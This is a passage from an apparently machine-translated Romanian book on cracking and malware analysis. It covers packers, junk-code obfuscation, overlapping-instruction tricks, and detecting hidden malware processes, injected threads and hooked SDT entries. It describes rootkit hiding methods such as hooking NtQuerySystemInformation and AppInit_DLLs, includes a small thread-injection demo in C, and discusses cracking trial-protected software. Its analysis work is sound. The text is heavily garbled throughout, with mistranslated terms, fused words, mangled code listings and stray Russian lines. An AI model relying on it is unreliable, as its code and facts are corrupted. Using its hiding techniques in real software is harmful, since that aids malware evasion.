cazului în care vom decoda acest lucru Tabelul adreselor și nu va restabili echipele „furate” Pentrua contracara Dizassembler, Shiva generează o cantitate mare de cod polimorf și sare constant în mijloculinstrucțiunilor Comparația pachetelor principalele caracteristici ale celor mai populare pachete pentru UNIX și Linuxsunt enumerate pe scurt în tabel Prezentare generală a debuggerilor pentru UNIX și Linux este prezentată încapitolul , "Hacker Tools for UNIX și Linux" Partea V Practic Coppering Tabelul Principalele caracteristiciale celor mai populare UNIX-Salesmen (proprietăți nefavorabile pentru hackeri sunt evidențiate printr-un fundal gri)caracteristic elf-crypt upx vugpeuy shiva contraatack Nu există nu, da, și nu există o opoziție față de Itrace șiposibilitatea de conectare la proces da, deci nu o opoziție eliminând Dumpa, deci nu nu, da, interfața LIBC SyscallSyscall Syscall are prezența unui despacker construit nu, nu nu, nu hacking Da, da, da, când piața de software închisăpentru UNIX va ajunge la un punct critic, pachetele fișierelor executabile pot începe să joace un rol semnificativ Întretimp, acestea sunt potrivite doar pentru distracție și pentru a se pregăti pentru o luptă cu un adversar cu adevăratserios Utilitățile de hacker pentru UNIX sunt deja scrise și, până când mecanismele de protecție intră în arenă,dezvoltatorii sunt surprinși să constate că situația nu este deloc aceeași ca acum câțiva ani, iar acum nu sunt opuse depionieri, dar bine trainate Specialiști care nu intimidează nicio cale de rulare Capitolul Obfusarea și depășirea sa în urmă cu câțiva ani, cândCybervas păreau să se termine, iar hackerii au rupt totul și toate, programatorii și -au întors brusc armele împotrivahackerilor - obstacolul codului Nu există metode adecvate pentru confruntarea acestei tehnici astăzi, dar primii pași înaceastă direcție au fost deja făcuți Fincația OB este un set de metode și instrumente care vizează dificultăți înanalizarea codului software Există diverse tipuri de obstacole: unele sunt angajate în limbi interpretate precum Perlsau RNR și „Root” textele sursă (ștergeți comentarii, dați variabile nume fără sens, criptarea constantelor de șir),altele „măcinează” codul de byte al java virtual virtual Mașini și NET, care tehnic fac ce să facă mult maidificil Cele mai avansate obstacole invadează direct în codul mașinii, „diluând” instrucțiunile sale de gunoi șiefectuând o serie de transformări structurale (mai puțin matematice) care schimbă programul dincolo de recunoaștere Aicivom vorbi despre acest tip de „confuzie” De fapt, acestea sunt aceleași generatoare polimorfe, cunoscute încă din celemai vechi timpuri, numite doar oarecum diferit Problema este că un generator polimorf poate genera cel puțin un miliardde echipe fără sens în câteva secunde, amestecându -le cu mai mulți kilobiți de cod util - procesoare moderne și harddisk -uri permit acest lucru, chiar și cu o pierdere de eficiență Dezasamblatorii nu au învățat încă cum să elimine„gunoiul” în modul automat, dar nu este realist să analizăm manual megabyții codului Avem nevoie de metode avansate dereconstrucție a fluxului de control care să analizeze codul „plin” și să -l împărțească în fracții „utile” și„inutile ” Nu există încă astfel de metode, chiar și la nivelul „înțelegerii teoretice” Și deși unele Ideile asupraacestui scor există încă (de exemplu, impunerea unei trasee de urmărire pe dependențe în conformitate cu date),implementarea practică este încă departe Metodele de obstacole au fost utilizate de mult timp de pachete avansateprecum Armadillo, acum redenumită software Pașaport (http://siliconrealms com/armadillo shtml), extreme protector(http://www oreans com/xprotector/), etc Majoritatea protectorilor „confundă” doar propriul lor unpacker, temându -sesă intervină în cod a programului protejat, deoarece acest lucru este plin de aspectul neașteptat de glitches într -omare varietate de locuri pe care programatorul le va plăcea o astfel de protecție? Cu toate acestea, obstrucțiaprocedurilor pentru verificarea numărului de serie (fișier cheie) este destul de frecventă De obicei, acesta este esteimplementat în podeaRegimul ubomatic, când creatorul protecției într -un fel sau altul interacționează cu obstacolul (deexemplu, scrie un script, pe care obstacolul îl transmite într -un cod de mașină de gunoi, reprezentând un compilator„ineficient”) OppousKation creează probleme reale pentru hackeri (Fig ), împiedicând reconstrucția algoritmilor șiprotecția rapidă a hacking -ului Cu toate acestea, aceste probleme se estompează înaintea situației din obusculareaantivirusului (engleză) - literalmente „confuzie” ; Partea V Cordul practic -Cord -Cord al industriei Pentru a hack programul, nu este necesar să se analizezealgoritmul său în cazul general Dar pentru a detecta un cod rău intenționat (malware) fără acest lucru nu va reuși!Înacest capitol, ne vom concentra exclusiv pe metodele de a hacking programele „confuze” cu care hackerii trebuie să seconfrunte din ce în ce mai des Orez O încercare de a hack un program protejat de Armadillo duce la blestemeteribile de protecție, metodele propuse aici se adresează în principal programelor protejate de „perioada deîncercare” Acest lucru înseamnă că, de ceva timp, programul ar trebui lansat într-un mod complet funcțional, fără anecesita o cheie (iar majoritatea programelor sunt distribuite în astfel de condiții) Această afecțiune poate păreainutilă pentru cineva Dar ce zici de programele cu capacități sau programe blocate care nu încep fără o cheie?Vai!Îngeneral, este extrem de dificil să le hack!Dacă programatorul a criptat o parte a programului cu un algoritmcriptografic persistent, atunci fără a cunoaște cheia oportunităților blocate, hackerul nu mai poate ajunge!Adevărat,dacă Cracker are cel puțin o singură cheie (de exemplu, mai mulți hackeri au cumpărat un program într -un pliu), atuncisituația este simplificată vizibil Dar, chiar și în acest caz, este mai ușor să distribuiți cheia în sine decât sătrageți în intestinele codului confuz Apropo, care sunt tehnicile de confuzie prin intermediul tehnicilor de intrare?Cumfuncționează în sine obstackerul în sine, obstacolul în sine nu este o propoziție Nu orice obstacol folosește metodeprogresive „confuze”, așa că nu se încadrează imediat în disperare, constatând că programul Hackneyed a suferitobscură În cel mai simplu caz Generatorul polimorf „pur și simplu„ pompează ”programul unei grămadă de comenzi nesemnificative, cum ar fi NOP, XCHGReg, Reg sau Reg, Reg ;Niciodată efectuată de Crossings precum Xor Reg, Reg/JNZ Junk, unde Xor este o echipăsemnificativă, un gunoi este un „cod mort”, etc Un exemplu de cod procesat de o astfel de compulsie este dat în lista sau ch, ch;„Gunoi” care nu afectează registrul CH;Cu toate acestea, afectarea registrului de pavilion;Acest efecteste blocat de porcul ulterior Hog eah, eah;Echipă potențial semnificativă;(De ce „potențial” va fi explicat puțin maideparte) Seto Bl;„Gunoi”, setarea S în , dacă există;revărsare, iar după Hog a dispărut întotdeauna Repne Jnz ShortLOC A;„Gunoiul”, care transferă controlul, dacă nu zero, merită, totuși, să observăm că comenzile „familiei” saureg, reg (test reg, reg, adaugă reg, ) afectează steagurile și numărul Din „complet indiferent” nu se aplică în niciunfel Capitolul Obfusarea și depășirea Dar după Xor, steagul zero esteîntotdeauna stabilit, plus herpe -ul prefixului fără sens Rep JNP Short LOC D "Garbage", care transferă controlul,dacă este ciudat, și după porc, steagul plăcii este întotdeauna instalat de Jo Short LOC "Garbage", caretransferă controlul dacă steagul de revărsare este setat și este aruncat de către Hog XCHG EBX, EBX;■ „Gunoi”, schimbulde registre EBX în locuri Nu prea complicat Un script pentru IDA Pro va găsi toate comenzile clar nesemnificative și leva marca ca „gunoi” sau ștergere completă Autorul IDA Pro, Ilfak Guilfanov, a scris de mult timp evidențiator - IDA ProPlugin, destinat doar în acest scop (Fig ) și răspândind textele sursă gratuit: http://www hexblog com/ IDA PRO/Files / Highlighter zip Cu toate acestea, acest liber este foarte condiționat Pentru a compila un plugin, aveți nevoiede un produs IDA SDK, și nu de unele, ci doar cea mai recentă versiune Totuși, acesta nu este un motiv pentru a fisupărat - până la urmă, exact același algoritm poate fi realizat și independent, folosind scripturile încorporate în IDAPro / cod de gunoi adăugat de Fig Obstacker Rezultatul lucrării pluginului Highlighter, care permiteetichetarea comenzilor „gunoiului” ale caracteristicii albastre (marcarea este efectuată manual, deoarece nu existănicio automatizare în Higlighter) Limba în sine este descrisă în detaliu în următoarea carte: Chris Kaspersky „Modulde a gândi este IDA Pro Dizassembler” -M : Solon-R, Partea V Practică COCOMPAULUS mai complexă „amestecă”codul, răsucind fluxul de control în spirala confuză a tranzițiilor condiționate și necondiționate folosind tehnicaechipei „de trecere” Drept urmare, se dovedește că unii octeți aparțin doi simultan și, în unele cazuri, treiinstrucțiuni ale mașinii, care „orbește” dizassemblers, forțându -i să genereze o listă incompletă și incorectă!Cu toateacestea, în modul interactiv al IDA al RGO, codul este încă posibil, dar foarte obositor Este mai bine să folosiți untracer care generează listarea comenzilor cu adevărat efectuate Pe parcurs, acest lucru vă permite să scăpați de o partedin gunoi și de codul „mort” Vom vorbi despre Tracer, dar deocamdată vom reveni la DizAssemblers Luați în considerare unfragment din listarea generată de IDA a RGO în timpul Dizassembling -ului programului procesat de obstacol folosindechipa „Crossing” (listarea ) lista Demonstrarea tehnicii „suprapuse” a echipelor de mașini utilizate deObfusk- adata: E LOC E :, cod xref: adata: j adata: e; adata: LOC A*J Adata • e nov eax, EBB EBH ADATA • ADATA: LOC :;C'odf xref: adata: oc dj adata: seto bl;Saltând în mijlocul echipei adata: sau CH, BH Adata: JMP SHOI RT LOC ADATA: DATA A LOC A :;Cod xref: adata: j adata: a repne jmp scurt: lângă PTI OS EC ADATA D ADATA: D LOC D :;Code xref: adata: OC CJ ADATA: D JMP scurt lângăPTR LOC + Acordați atenție comandă DH: JMP scurt OS + , dedicat Vânzare FOFFIC Această comandăefectuează tranziția la adresa H+ H == H, adică în mijlocul instrucțiunii i H: Seto Bl (evidențiată șiîn fontul semi -fat) Mai mult, tranziția se desfășoară tocmai în mijlocul echipei Din punctul de vedere alDizassemblerului (chiar și un astfel de perfect ca IDA al RGO), echipa este „atomică”, adică o unitate indivizibilă,structurală De fapt, orice instrucțiune a mașinii constă în Secvență de momeală și poate fi făcută din orice poziție!În orice caz, procesoarele X nu necesită alinierea codului Cualte cuvinte, nu avem „echipe”, avem doar octeți!Dacă începeți să implementați instrucțiunile nu de la primul octet, vomprimi o echipă complet diferită!Din păcate, IDA a RGO nu vă permite să aflați care Pentru a efectua tranziția IDH:JMP Short OS + , trebuie să aducem cursorul la marca OS și să apăsăm tasta pentru a „se strica” codulByzAssembler pentru octeți, apoi accesați adresa H și apăsați cheia Pentru a transforma octeții în codulDizAssembler Codul obținut ca urmare a acestor acțiuni este prezentat în lista Listarea DescifrareaComandamentului Superior Adata: E ULK E DB Adata: F DB Adata: DB Adata: DB Adata: LOC :-j;Cod xref: adata: LOC J OEBH;S B H;|;Cod xref : ADATA: LOC AJ ShortLOC Capitolul OB Furificări și depășirea Adata: NOP AADATA: Adata: S :;Cod xref : adata: LOC DJ Adata: JIRP scurt LOC F; G salt aici adata: adata: std adata: jnp scurt loc adata: a adata: a loc a :;Cod xref : Adata: J Adata: A Repne JNP Short LOC Vedem că câteva instrucțiuni JMP LOC F/STD au avut loc pesite -ul instrucțiunilor SETO BL Care dintre cele două frunze este corect?Primul sau al doilea?Separat - nici unul, nicicelălalt Ele devin „corecte” doar dacă sunt considerate în combinație!Dar păstrarea acestor detalii în cap estenerealistă, iar comutarea rapidă între două opțiuni IDA Pro nu permite Rămâne să aducem listare „alternativă” încomentariu, dar acest lucru este posibil doar cu câteva astfel de listări Dacă aceeași echipă de mașini are trei sau maimulte puncte de intrare, atunci comentariile nu mai sunt salvate și apare confuzia, forțând un tracer în loc deDizassembler în loc de Dizassembler (comparați scorul de dezasamblare cu protocolul de urmărire dat în lista ) Obstacolele sofisticate monitorizează dependențele în funcție de date, introducând instrucțiuni semnificative cu„efectul zero” Să explicăm acest lucru cu un exemplu specific Să presupunem, designul a fost întâmpinat de OBUSKOTOR,prezentat în lista Listarea , cod original înainte de procesare de către Obstacker Push EAH; + Vezi un ecran negru Ce urmeaza?Este timpul să deschidem vălul secretelorpeste unele secrete de hackeri De asemenea, timpul lasă imprimeuri cel mai adesea Programul rău intenționat își copiazăcorpul într -un nou fișier cu un nume aleatoriu sau fix, mai rar - introdus în fișierele existente A doua abordarenecesită nu numai cunoașterea structurii re-fișierului, ci și anumite privilegii În special, având privilegii ale unuiutilizator obișnuit, sistemic Fișierele nu se infectează În același timp, marea majoritate a scriitorilor malware uită să ajusteze data/ora creăriifișierului, emiterea cu capul Să presupunem că am lansat un fișier de origine dubioasă și vrem să știm dacă a făcutvreun trucuri murdare în sistem?Primul lucru care îmi vine în minte este să îndeplinești fișierele create pentru adouăzeci și în ultimele zile (în cazul nostru, într -una) Toate schimbările care au avut loc în sistem în ultima zidevin vizibile în palma mâinii tale!Ca opțiune, puteți începe Far Manager (Fig ), setați modul de sortare până ladata creării ( + ) și vizualizați toate fișierele „aur”, inclusiv Winnt, System , etc , GPAVA Detectarea,depanarea și Dizassembling of Programes Malicious create de acesta din urmă vor fi în partea de sus alistei Recepția este simplă, dar extrem de eficientă!Orez Studiul datei creării fișierelor folosind Far Manager,desigur, cu cât o putem face mai târziu, cu atât va fi mai dificil să distingem fișierele „legale” de „ilegal”, mai alesdacă un număr mare de software sunt cele mai diverse software plasat pe computer Dar toate fișierele instalate deinstalator (oriunde le postează - în fișiere de program, Winnt sau System ) au aceeași dată de creare cu un timp mic întimp (deoarece fișierele sunt create nu în paralel, ci secvențial), deci ele acestea poate fi imediat posibil excludedin lista suspecților Iar cele rămase sunt examinate în detaliu Desigur, data creării fișierului este elementarămodificată de Win ARI, iar software -ul rău intenționat, dacă doriți, nu costă nimic de deghizat Cu toate acestea, însecțiunile formatate pentru utilizarea NTF -urilor, fiecare fișier are multe atribute „invizibile” care nu pot fi atinseprin ARI În special, atributul H ($ file name), pe lângă timpii standard de creare, modificare și ultimă manipulare,păstrează timpul ultimei modificări a acestei înregistrări MFT Fișierele „cinstite” au timpul și timpul ultimeimodificări MFT coincid întotdeauna și, dacă nu este cazul, avem de -a face cu un fals Există, de asemenea, un atribut de H ($ Standard information), care stochează, de asemenea, informații despre momentul creării, modificării și ultimulacces la fișier, precum și despre momentul ultimei modificări MFT Cu toate acestea, spre deosebire de atributul H,aici momentul celei mai recente modificări MFT este actualizat automat la fiecare tabel de fișiere (MFT) este unmetafila specială care conține informații despre toate celelalte obiecte de sistem de fișiere Întrebările legate destructura NTF -urilor sunt dezvăluite în detaliu în următoarea carte: Chris Kaspersky "Restaurarea datelor Conducerepractică "-St Petersburg: BHV-Petersburg, Partea V Capacitatea de cordon practică o dată, când o nouăporțiune de clustere este eliberată și, prin urmare, nu poate coincide cu timpul creării sale Nu există atât de multeutilități care afișează conținutul MFT într -o formă lizibilă Unul dintre ei este NTEXPLORER din software -ul Runtime(Fig ) Mai simplu spus, acesta este un analog al editorului de disc Norton, dar conceput pentru NTFS Din păcate,NTexplorer nu acceptă nici plugin -uri, nici scripturi, deci nu va fi posibil să afișăm rapid o listă de fișiere cu datefalse ale creației Fiecare dintre fișierele suspecte trebuie examinate manual Din fericire, NTFS este un sistem defișiere complet (după standarde moderne) și toate structurile sale principale au fost de mult timp reconstruite,documentate și postate în rețea: http://linux-ntfs org Change = fltTribute -== -= modificarea atributelor fișieruluipentru syse exe [] EAD [x] rchive z idden [ ampressed [] ncrypted : SS / / ASTAccess C / !” , în același timp în care intrarea corespunzătoare în MFT a fost modificată la / / , procesulde procese, de obicei, un program rău intenționat își creează propriul proces (mai rar - introdus în străini), în timpce are o dorință complet naturală de a ascunde Acest proces, eliminându -l din „Dispeceratul sarcinilor” și alteutilități sistemice Cum o face? Pentru a oferi informații despre procese, sisteme de operare din familia Windows NTacceptă două mecanisme: un set de proceduri documentate Toolhelp (moștenire de la Windows , principala funcție ainstrumentuluihelp - createtoolhelp snapshot - se bazează pe deplin pe ntquerysysteminformation, astfel încât De fapt, avem un mecanism, doar interfețele sunt diferite Programul rău intenționat poate intercepta cu ușurințăprocedurile Proces First/Process Next din ToolHelp Dar acest lucru nu îi va oferi nimic, deoarece aproape toateutilitățile („dispecerat de sarcini”, Far Manager și chiar programul primitiv tlist exe de la SDK) funcționează exclusivprin NTQuerySysysteminformation (care este ușor confirmat de instalarea punctului de oprire a GPav Programe dedetectare, depanare și dezasamblare în Softice) Cu toate acestea, interceptarea ntQuerySystyminformationde la nivelul aplicat nu este mai complicată decât procedurile din setul Toolhelp !Există multe modalități de a faceacest lucru: □ Modificați ntdlll dll pe disc prin instalarea comenzii NTQuerySysteminformation la începutul tranzițieila propriul procesor, introdus în spațiu liber în NTDLL DLL și „Curățarea oricărei mențiuni despre informațiile emise deFuncția interceptată Metoda de simplu, dar „murdar” Este ușor detectată de DizassMitting NTDLL DLL sau de comparațiasa cu originalul În plus, programul rău intenționat va trebui să reziste mecanismului SFC, precum și instalareapachetelor de actualizare (Service OTS), dintre care unele actualizează ntdlll dll Dll! DLL dobândește o natură localălimitată de contextul înregistrării Astfel, pentru a afecta „sarcinile dispecerilor de dispecerat”, ar trebui să fieimplementat mai întâi!Iată unul dintre scenariile posibile: Programul rău intenționat își creează DLL -ul și îl prescrieîn următoarea sucursală a registrului de sistem: HKLMXSOFTWAXMICROSOFTXWINDES NT \ CurrentVersion \ Windows \Appinit Dlls, ca urmare a acestui DLL, va fi afișat pentru toate procesele Pentru un secret mai mare, puteți modificantdll dll numai în contextul proceselor care sunt utilizate pentru a afișa lista de sarcini (Taskmgr exe, far exe,tlist exe etc ) În acest caz, după ce am analizat ntquerySystyminformation, privind în interior, nu vom găsi urme aleprezenței codului rău intenționat!Puteți, desigur, să verificați appimt dlls, dar aceasta nu este singura modalitate deimplementare, astfel încât sarcina de a identifica programul rău intenționat este brusc complicată □ Modificați tabelulde import Taskmgr exe ("Dispecer Task"), Prochst DLL (Far Manager Plugin, responsabil pentru ieșirea procesului deprocese), în primul exe pe disc (sau în memorie) Atunci când modificați tabelele de import, programul rău intenționatînlocuiește apelurile NTQuerySysteminformation cu propria funcție de caracteristică O astfel de interceptare estedetectată cu ușurință prin compararea fișierelor executabile cu imaginea lor de memorie, care poate fi obținută prineliminarea depozitului cu un utilitar precum instrumentele PE, în plus, programul rău intenționat va trebui săintercepteze în plus funcția GetProCadress pentru a monitoriza încărcarea dinamică a lui ntdll dll În prezențadrepturilor de administrator, un program rău intenționat poate pătrunde în ntoskrnl exe și poate înlocui serviciul Hcu propriul său gestionar Apoi, de la nivelul aplicat, procesul rău intenționat nu va mai putea detecta și va trebui săcoborâți la nivelul nucleului Această problemă va fi discutată mai detaliat în acest capitol, în secțiunea de restaurareSST Softice este poate singurul dintre toate programele care nu folosește ntquerysystemlnformat] Pentru a afișa procesulsoftice, acesta dezasamblează în mod independent structurile de bază ale sistemului de operare și, prin urmare,dezvăluie cu ușurință procesele ascunse (Fig ) Teoretic, programul dăunător se poate infiltra pe Softice și poateintercepta oricare dintre comenzile sale (de exemplu, echipa Proc), acționând în aceeași schemă ca și pluginurile binecunoscute Seext/Icedump (beneficiul este că ambele utilități sunt distribuite în textele originale )Cu toate acestea, în„natura vie”, astfel de monștri nu s -au întâlnit încă Se speră că pluginul Icext, care ascunde softice de majoritateaprotecției, îl va ascunde de programele rău intenționate Cu toate acestea, rămâne amenințarea căutării semnificative adebuggerului în memorie În plus, forumurile hackerilor discută un algoritm de ascundere ipotetică de câțiva ani,intercepând funcțiile comutării contextului și „ștergerea” în sine între schimbările de context Cu toate acestea,implementarea unui astfel de proiect se bazează pe dificultăți practice insurmontabile Formatul structurilorprocesorului este instabil și se schimbă de la o versiune a sistemului la alta, în plus, multe funcții fără documentesunt interacționate cu ele, cauzate în diferite momente din diverse locuri Programele rău intenționate care încearcă săse deghizeze în acest fel aduc constant sistemul în BSOD, care se dau imediat Partea V Cord -Cord -CordFig Softice arată procesul SYSRTL care nu există în „Task Manager” În acest fel, vom presupune că ligamentele de la Softice + Icext pentru a vizualiza toate procesele (inclusiv ascunse)sunt suficiente Interogarea fluxurilor în ultimii ani în programele din ce în ce mai des dăunătoare nu creează proceseindividuale pentru ei înșiși (care sunt foarte ușor de observat), ci preferă să le introducă într -unul dintre celeexistente Pentru acest lucru sunt utilizate două mecanisme În primul caz, programul rău intenționat alocă un bloc dememorie în procesul țintă, folosind funcția VirtualAllocex, se copiază prin WriteProcessMory și creează un flux de ladistanță prin CreateRemothyRead Al doilea mecanism începe în același mod ca primul, doar în loc să creeze un flux de ladistanță, programul rău intenționat oprește procesul curent al procesului și schimbă registrul EIR cu funcțiasetthreadContext (în mod natural, după ce și -a păstrat anterior valoarea inițială prin GetThreadContext )Mai mult,codul rău intenționat transmite gestionarea propriei proceduri care provoacă CreativeThread, care restabilește EIR și„decongelarea” fluxului oprit anterior Primul mecanism funcționează numai pe sisteme din familia Windows NT, iar aldoilea pe toate sistemele familiale Windows pe de biți Cum să detectați o astfel de metodă de invazie?Desigur,numărul de fluxuri ale procesului atacat crește cu unul, dar acesta nu este un indicator Nimeni nu poate spune niciodatăexact câte fluxuri ar trebui să aibă Chiar și dezvoltatorul său direct nu poate ști acest lucru!Să desfășurăm unexperiment simplu Lansați un „Notebook” și, trecând la „Task Dispecer”, vom vedea un singur flux Acum vom alegecomenzile fișierului I Deschideți meniul Numărul de fluxuri sare brusc până la cinci!Închideți fereastra de deschidere afișierului - Un flux dispare, patru rămân De ce se întâmplă asta?Se dovedește că totul este în bibliotecile dinamice aleshlwapi dll, rpcrt dll și ole dll, „servind” fereastra și generează propriile lor filiale Unii șoferi pot da naștereși fluxurilor din aplicațiile altor persoane (de obicei cu scopul de a apela ARI aplicat) Trebuie să învățăm cumva cumsă distingem fluxurile „legale” de „ilegal”, altfel lupta noastră împotriva programelor rău intenționate este sortităînfrângerii Iată o idee simplă, dar eficientă Adresa de pornire a fluxului legal se află în imaginea paginii (însecțiuni Cod și Pentru a expune imigranții ilegali, suntem, în primul rând, GPAV Detectarea, depanarea șidizassemblificarea programelor rău intenționate vor avea nevoie de o hartă a spațiului de adrese Softice o reflectănu într -o formă cea mai vizibilă, deci este mai bine să folosiți instrumente OllyDBG sau PE În Ollydbg în meniulFișier, selectați comanda Atașați și indicați procesul ale cărui fluxuri vom explora După atașarea cu succes la proces,selectați Vizualizarea |Geanta sau faceți clic pe combinația de tastatură -G Un exemplu de card de memorieprimită în Fig Orez Harta „Notepad”, afișată de PE Instrumente Partea de utilitate V Regiunile decapacitate practică a cordonului marcate ca private (private) aparțin unor blocuri de memorie dinamică, iar eticheta demapare (mapare) corespunde proiecțiilor fișierelor create de CreateFileMappang/ MapViewoffile )Etichete IMAM (Imaging)au marcat imagini de pagină ale fișierelor executabile sau bibliotecilor dinamice În instrumentele PE, în același scop,este necesar să se evidențieze procesul și să selectăm comanda Regiunii Dump din meniul contextual În același timp, peecran va apărea o casetă de dialog cu un card de memorie - nu la fel de detaliată ca cea a Ollydbg, dar destul desuficientă pentru a rezolva problema noastră (Fig ) Pentru experimente suplimentare, vom avea nevoie de un programcare să creeze câteva fluxuri - o cale „cinstită” și „necinstită” Codul sursă (procesarea erorilor și alte situațiiexcepționale este redusă pentru brevet) poate arăta așa cum se arată în lista Listarea L Codul sursă alprogramului demonstrativ VAJHREAD C, compilat cu setările implicite #include #include // Cod deflux care nu face nimic, ci doar răsucește ciclul Thread () {while ( );} pelvis p () {void *p;// variabil multi -scop //Creați un flux „onest” CreateTheThread ( , (void*) și thread, x , & p);// Creați un flux „necinstit” așa cum facemalware -ul // Selectați un bloc de memorie dintr -o grămadă, copiați codul de flux acolo // și apelați CreateThread P =virtuallockfo, x , mem commit, page execute readwrite);Memcpy (p, thread, x ); createThread ( , , p, x , &p);// Așteptăm să apăsăm pe Enter Primește (& p);Compilează acest program, îl lansăm pentru execuție, mergem la Softice,dăm comanda thread -x (concluzia informațiilor detaliate despre fluxuri) și urmărim rezultatul (listarea ) Listarea Informații despre fluxurile raportate de Softice (redus) Thread -X Informații extinse pentru fir pentru thread KTEB CFDA TID: Process: va thread(llC) Start EIPsKERNEL !SetUnhandledExceptionFilter+ООІА ( E C ) User Stack: - Stack Ptr: FD ExtendedThread Info for thread KTEB: TID: Process: va thread(HC ) Start EIP:KERNEL !CreateFileA+OOC ( E C ) User Stack: - Stack Ptr: FFFFFFFF Гпава Обнаружение, отладка и дизассемблирование зловредных программ Start ЕІР: User Stack: Extended Thread Info forthread C AC TID: KERNEL ! CreateFileA+ C ( E C ) - STACK PTR: C Proces:VA THREAD (LLC) FFFFFFFFF ca acesta!Softice nu a putut determina adevăratele adrese de pornire ale fluxurilor, pierduteîn intestinele kernel dll Ei bine, să încercăm un alt instrument - Utilitatea Explorer Process de la Mark Russinovich(http://www microsoft com/tedmet/sysinternais/processandthreads/ ProcessExplorer mspx) Descărcați Process Explorer,Lansare, indicați cursorul pe va thread Ehe, apoi în meniul contextual selectăm elementul Proprietăți și în caseta dedialog care se deschide în fila Threads (Fig ) Orez Utilitatea de explorare a procesului de la MarkRussinovich nu a putut, de asemenea, să determine adresa de pornire a fluxului ilegal, ce vedem?Adresele a două fluxurisunt determinate corect În primul rând: va thread exe+ xl , judecând după adresă, reprezintă fluxul principal (adresacoincide cu punctul de intrare, care este ușor de verificat în Hiew) În al doilea rând: va thread exe+ xl este unflux „onest” creat (care este din nou verificat la Hiew), dar al treilea este Kernel dll+ xb -acesta este un flux„ilegal”, doar adresa sa de pornire este definită incorect!Solicităm ajutorul Ollydbg și încercăm să înțelegem situațiape cont propriu, fără toate aceste farmecuri de automatizare și alte minuni ale progresului tehnologic După ce s -aconectat la aproximativ Partea V, Corpopția practică a va thread exe la meniul va thead exe, selectați elementul dethread și găsiți nu trei (așa cum era de așteptat), ci patru fluxuri (listarea ) , Listarea Информация очетырех потоках, выданная OllyDbg Ident Entry Data block Last error Status Priority C B FFDB ERROR SUCCESS Active + FFDC ERROR SUCCESS Suspended t- C FFDE ERROR SUCCESS Suspended + FFDD ERROR SUCCESS Suspended + Adresa de pornire (intrare) este definită doar pentru unul dintre fluxuri - ch șichiar el servește probabil pentru o conjuncție a procesului depanat cu Ollydbg Adresele de pornire ale fluxurilor rămasesunt afișate la zero, dar nu este așa!Facem clic pe flux cu un identificator de H (în mod natural, data viitoare cândse lansează programul, identificatorii fluxului vor fi diferiți) și vom primi codul afișat în lista Judecând dupăcardul de memorie, acest cod aparține aspectului paginii, prin urmare, acesta este un flux legal ;Listarea Cod deflux H, localizat în pagina Imaginea Push Hebus V EU MOV HEB, ESP MOOH EAH, C Test EAH, ex A JE Scurt VA THREA C EU JMP Scurt Vara la fereastra Stack, mișcând Sliderulchiar de jos În partea de jos a stivei, vedem un argument transmis de flux (al doilea cuvânt dublu, în acest caz egal cu H) și adresa fluxului de pornire care se află în cel de -al treilea cuvânt dublu și, în acest caz, un h egal(listarea ) De fapt, în funcție de metoda de creare a fluxului, adresa de pornire poate fi atât în ​​al treilea, câtși în cel de -al doilea cuvânt, prin urmare, utilitățile automate sunt confuze în lecturi Listarea На днепользовательского стека потока h лежит стартовый адрес вместе с переданным ему аргументом FFDC FFFFFFFF Endof SEH chain FFE F SE handler FFE B KERNEL B FFE FFEC FFF FFF va threa ;Adresa de pornire a fluxului H FF ; SdTrestore SdTrestore Versiunea Proof-C> f-Concept de Sig ~ G-TEC (www security org sg;keserviceScriptOrtable dfa keservicedEcriptorlable I Servit: Elable B KeseruiceScriptOrtable ServiIcelimit [ZwallocatevirtualMory [agățat de necunoscut la F CE ] - ZwCreateFile - [Agățat de necunoscut laF CA ] - ZwCreateKey - [Agățat de necunoscut la F CC E] - ZwCreateProcess - [conectat de necunoscut laF CDB ] - ZWDELETEFILE - [Cârligă de necunoscut la F C C - ZwgettickCount - [Clooked by Necunoscut laF CE ] - ZWLoodDriver - [Alocat de Necunoscut la F CBF - ZwQueryDirectoryFile D - [Cârlig de UNEPUNTF C ]Erysystemlnformat ion - [agățat de necunoscut la F C ] - ZwsetlnFormationFile - [agățat de necunoscutla F C A ] - Numărul de intrări de serviciu agățat: avertizăriFixarea SDT poate avea consecințe grave, cum ar fiprăbușirea sistemului, pierderea de date sau corupția sistemului Continuați -vă pe propriul dvs risc Ai fostavertizat Remediați intrările SDT (Y/N)?: [*] Patched SDT Entry to A F [*] Patched SDT ENTRY to EF [-]PATCHED SDT Entry To B [-] PATCHED SDTRY to A [*] PATCHED SDT ENTTRED ENTTRED EN Patched SDT Entry c to g [*] Patched SDT Intrare la DC [*] Patched SDT Intrare D la [*] intrare SDT patched b b [-] intrare SDT patched SDT Rezultatul utilității SDT de restaurare pe o mașină, infectată cu un programrău intenționat folosind restaurarea SDT, ar trebui să fie avut în vedere că au apărut deja rute care ar putea ocoli Înprimul rând, pentru a căuta SST-ul original, utilitatea SDT Restore folosește un mod simplu, dar nesigur, referindu-sela KeserviceScriptScriptElFable [ ], pe care programul rău intenționat poate fi înlocuit (vezi http://hi-tech nsys by/ / )În al doilea rând, recuperarea SST în sine are loc cu un nivel aplicat prin pseudo-decizareafizicmemory, afișată în memorie prin nativul ntmapviewoVofsenenit, ușor interceptat atât de la niveluri aplicate, cât șinucleare După interceptarea cu succes, interceptarea rămâne doar pentru a verifica dacă NTMAPViewoFsection este apelatcu descriptorul PhysicalMemory și, dacă da, fie blochează accesul sau imită recuperarea fără de fapt (vezihttp://www rootkit com/newsread php? NewsID = )De asemenea, trebuie avut în vedere faptul că o anumită protecțieeste „spânzurată” de vectorul de întrerupere descris în tabelul IDT și verificați serviciile interceptate, de exemplu,fiecare cronometru TIC Partea V Cordul practic -Cord -Capacitate în IDT -ul corect (care poate fi vizualizat princomandă în softice) Toți vectorii indică în interiorul ntoskrnl exe sau haal dll (listarea ) : IDT INTBASE IDT BURE= INTG LNTG INTG INTG Sel:Offset Limit= FF : E : : E : A E Attnbutes DPL= P DPL= P DPL= PDPL= P Symbol/Owner ntoskrnl'Kei EoiHelper+ ntoskrnl'Kei EoiHelper+ E ntoskrnl! KEI EOIHELPER+ B Înplus, programele rău intenționate se pot instala la început (sau chiar la mijloc!) A unor funcții nucleare tranziția(ZITR) la procesorul lor care controlează integritatea SST/IDT interceptată Pentru a identifica această metodă deinterceptare, este necesar să se comparăm imaginea nucleului cu fișierul ntoskrnl exe, care poate fi realizat folosindutilitatea PE cu un plugin extremă de coajă sau salvând nucleul nucleului direct de la Softice în sine cu extensiileinstalate de ICEXT sau ICEDUM Este demn de remarcat faptul că a doua abordare este mult mai fiabilă Un audit șidizassemblificare a exploatărilor de exploatare care arată prezența unei găuri (dovada conceptului) de obicei răspândităîn textele 